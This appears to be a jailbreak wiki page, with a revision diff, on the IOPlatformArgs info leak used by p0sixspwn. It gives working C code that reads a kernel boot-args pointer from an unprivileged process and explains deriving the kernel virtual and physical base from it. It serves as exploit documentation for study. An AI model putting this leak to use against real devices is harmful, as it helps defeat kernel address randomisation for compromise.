Difference between revisions of "IOPlatfromArgs leak"
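--- a/IOPlatfromArgs leak
+++ b/IOPlatfromArgs leak
@@ -8,5 +8,4 @@
 CFStringRef parameter = CFSTR("IOPlatformArgs");
 CFDataRef data;
-
 io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
 if (platformExpert)
@@ -16,10 +15,8 @@
 kCFAllocatorDefault, 0);
 }
-
 IOObjectRelease(platformExpert);
 CFIndex bufferLength = CFDataGetLength(data);
 UInt8 *buffer = malloc(bufferLength);
 CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
-
 typedef struct {
 uint32_t deviceTreeP;
@@ -30,5 +27,4 @@
 platformArgs IOPlatformArgs;
 bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
-
 return IOPlatformArgs.bootArgs;
 }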
Latest revision as of 13:39, 4 July 2014
Vulnerability used in p0sixspwn
This info leak exposes a kernel virtual address — the boot-args pointer stored in the IOPlatformArgs registry property, readable from an unprivileged process — from which the kernel base address can be derived.
The code that reads it:
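/*
 * Read the IOPlatformArgs property of IOPlatformExpertDevice and return the
 * boot-args pointer stored in it. The property is reachable from an
 * unprivileged process and the value is a kernel virtual address, which is
 * why p0sixspwn uses it as an info leak.
 *
 * Layout assumed for the property (32-bit ARM kernels): four uint32_t words,
 * the second of which is the boot_args pointer. NOTE(review): the layout and
 * whether the property is exposed at all are iOS-version dependent — confirm
 * on the target before relying on this.
 *
 * Returns the boot-args address, or 0 if the platform expert cannot be found,
 * the property is missing, is not a CFData, or is shorter than the expected
 * layout (0 is never a valid kernel pointer, so it is safe as a sentinel).
 *
 * Fixes relative to the original listing: `data` was left uninitialized when
 * the platform expert lookup failed and was passed to CFDataGetLength() even
 * when the property was NULL or not a CFData; the malloc'd scratch buffer and
 * the CFData were never released; and bcopy() read sizeof(platformArgs) bytes
 * regardless of the property's actual length (out-of-bounds read on a short
 * payload). The heap copy is unnecessary — CFDataGetBytes() can fill the
 * struct directly.
 */
static uint32_t
get_kernel_base_boot_args(void)
{
    /* Expected wire layout of the IOPlatformArgs property. */
    typedef struct {
        uint32_t deviceTreeP;
        uint32_t bootArgs;
        uint32_t zero;
        uint32_t zero_1;
    } platformArgs;

    io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                              IOServiceMatching("IOPlatformExpertDevice"));
    if (!platformExpert) {
        return 0;
    }

    CFTypeRef property = IORegistryEntryCreateCFProperty(platformExpert,
                                                         CFSTR("IOPlatformArgs"),
                                                         kCFAllocatorDefault, 0);
    /* The registry entry is no longer needed once the property has been copied out. */
    IOObjectRelease(platformExpert);

    /* The property may be absent or of an unexpected type; never treat it as CFData blindly. */
    if (!property) {
        return 0;
    }
    if (CFGetTypeID(property) != CFDataGetTypeID()) {
        CFRelease(property);
        return 0;
    }
    CFDataRef data = (CFDataRef)property;

    /* Refuse short payloads rather than reading past the end of the CFData. */
    platformArgs args;
    uint32_t bootArgs = 0;
    if (CFDataGetLength(data) >= (CFIndex)sizeof(args)) {
        CFDataGetBytes(data, CFRangeMake(0, (CFIndex)sizeof(args)), (UInt8 *)&args);
        bootArgs = args.bootArgs;
    }

    /* IORegistryEntryCreateCFProperty() returns a +1 reference; release it. */
    CFRelease(data);
    return bootArgs;
}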
Once the attacker knows the virtual base, the virt_to_phys macro yields the corresponding physical base, so both addresses are leaked. All of this relies on the IOPlatformArgs bug.